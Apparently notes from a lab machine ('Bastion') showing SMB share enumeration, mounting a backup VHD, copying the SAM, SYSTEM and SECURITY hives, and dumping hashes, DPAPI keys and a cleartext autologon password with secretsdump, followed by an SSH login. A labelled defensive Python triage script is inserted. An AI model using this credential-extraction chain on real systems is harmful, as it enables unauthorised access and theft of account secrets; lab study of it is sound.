2 :139 :445 smb
$ smbclient -L 10.10.10.134
Enter WORKGROUP\kashz's password:
Sharename Type Comment
--------- ---- -------
ADMIN$ Disk Remote Admin
Backups Disk
C$ Disk Default share
IPC$ IPC Remote IPC
SMB1 disabled -- no workgroup available
$ smbclient //10.10.10.134/Backups
Enter WORKGROUP\kashz's password:
Try "help" to get a list of possible commands.
smb: \> dir
. D 0 Sat May 8 16:29:34 2021
.. D 0 Sat May 8 16:29:34 2021
nmap-test-file A 260 Sat May 8 16:29:34 2021
note.txt AR 116 Tue Apr 16 03:10:09 2019
SDT65CB.tmp A 0 Fri Feb 22 04:43:08 2019
WindowsImageBackup Dn 0 Fri Feb 22 04:44:02 2019
WindowsImageBackup files contain .vhd files that we should look into.
Mounting the share
Using https://medium.com/@klockw3rk/mounting-vhd-file-on-kali-linux-through-remote-share-f2f9542c1f25
$ sudo mount -t cifs //10.10.10.134/Backups /mnt/remote -o rw
[sudo] password for kashz:
Password for root@//10.10.10.134/Backups:
$ cd /mnt/remote
$ ls
nmap-test-file note.txt SDT65CB.tmp WindowsImageBackup
# making /mnt/vhd for one
# NEED TO RUN THIS AS SUDO USER INTERACTIVELY; otherwise it didn't work for me. I was getting a perms error while accessing the vhd files once mounted.
(as root)$ guestmount --add "/mnt/remote/WindowsImageBackup/L4mpje-PC/Backup 2019-02-22 124351/9b9cfbc4-369e-11e9-a17c-806e6f6e6963.vhd" --inspector --ro /mnt/vhd -v
# cp SAM /home/kashz/Desktop/HTB/bastion
# cp SYSTEM /home/kashz/Desktop/HTB/bastion
# cp SECURITY /home/kashz/Desktop/HTB/bastion
$ secretsdump.py -sam SAM -security SECURITY -system SYSTEM LOCAL
(or /usr/share/creddump7/pwdump.py SYSTEM SAM)
Impacket v0.9.23.dev1+20210504.123629.24a0ae6f - Copyright 2020 SecureAuth Corporation
[*] Target system bootKey: 0x8b56b2cb5033d8e2e289c26f8939a25f
[*] Dumping local SAM hashes (uid:rid:lmhash:nthash)
Administrator:500:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
L4mpje:1000:aad3b435b51404eeaad3b435b51404ee:26112010952d963c8dc4217daec986d9:::
[*] Dumping cached domain logon information (domain/username:hash)
[*] Dumping LSA Secrets
[*] DefaultPassword
(Unknown User):bureaulampje
[*] DPAPI_SYSTEM
dpapi_machinekey:0x32764bdcb45f472159af59f1dc287fd1920016a6
dpapi_userkey:0xd2e02883757da99914e3138496705b223e9d03dd
[*] Cleaning up...
L4mpje:1000:aad3b435b51404eeaad3b435b51404ee:26112010952d963c8dc4217daec986d9:::
Pass: bureaulampje
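Added example (not part of the original notes): a short Python triage of the secretsdump output above, useful when auditing what an exposed backup image gives away. It flags accounts whose NT hash is the empty-string value, accounts with a real stored hash, and whether an autologon DefaultPassword LSA secret is present. The names triage, SAM_LINE and SAMPLE are hypothetical; the sample lines are copied from the output above with the secret value redacted.

```python
import re

# Well-known placeholder values: the LM and NT hashes of an empty string.
EMPTY_LM = "aad3b435b51404eeaad3b435b51404ee"  # no LM hash stored
EMPTY_NT = "31d6cfe0d16ae931b73c59d7e0c089c0"  # no NT password hash stored
WELL_KNOWN_RIDS = {500: "built-in Administrator", 501: "built-in Guest"}

# pwdump-style line as printed by secretsdump: user:rid:lmhash:nthash:::
SAM_LINE = re.compile(r"^([^:]+):(\d+):([0-9a-fA-F]{32}):([0-9a-fA-F]{32}):::$")

# Sample input: lines from the dump above (DefaultPassword value redacted).
SAMPLE = """\
[*] Dumping local SAM hashes (uid:rid:lmhash:nthash)
Administrator:500:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
L4mpje:1000:aad3b435b51404eeaad3b435b51404ee:26112010952d963c8dc4217daec986d9:::
[*] Dumping LSA Secrets
[*] DefaultPassword
(Unknown User):<redacted>
"""

def triage(dump_text):
    """Return (accounts, autologon_secret_present) for secretsdump-style text."""
    accounts, autologon = [], False
    for line in dump_text.splitlines():
        line = line.strip()
        if line == "[*] DefaultPassword":
            autologon = True  # autologon password is kept as an LSA secret
            continue
        m = SAM_LINE.match(line)
        if not m:
            continue  # banner, section header or secret value
        user, rid, lm, nt = m.groups()
        accounts.append({
            "user": user,
            "rid": int(rid),
            "role": WELL_KNOWN_RIDS.get(int(rid), "local user"),
            "lm_stored": lm.lower() != EMPTY_LM,
            "nt_is_empty": nt.lower() == EMPTY_NT,
        })
    return accounts, autologon

if __name__ == "__main__":
    accounts, autologon = triage(SAMPLE)
    for a in accounts:
        state = "no NT hash stored" if a["nt_is_empty"] else "NT hash present (rotate)"
        print(f'{a["user"]:<14} rid={a["rid"]:<5} {a["role"]:<24} {state}')
    print("autologon DefaultPassword secret present:", autologon)
```

Any account reported with a stored NT hash, and any autologon secret, should be treated as exposed for as long as the backup image was readable on the share.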
$ ssh l4mpje@10.10.10.134
The authenticity of host '10.10.10.134 (10.10.10.134)' can't be established.
ECDSA key fingerprint is SHA256:ILc1g9UC/7j/5b+vXeQ7TIaXLFddAbttU86ZeiM/bNY.
Are you sure you want to continue connecting (yes/no/[fingerprint])? yes
Warning: Permanently added '10.10.10.134' (ECDSA) to the list of known hosts.
l4mpje@10.10.10.134's password:
Microsoft Windows [Version 10.0.14393]
(c) 2016 Microsoft Corporation. All rights reserved.
l4mpje@BASTION C:\Users\L4mpje>whoami
bastion\l4mpje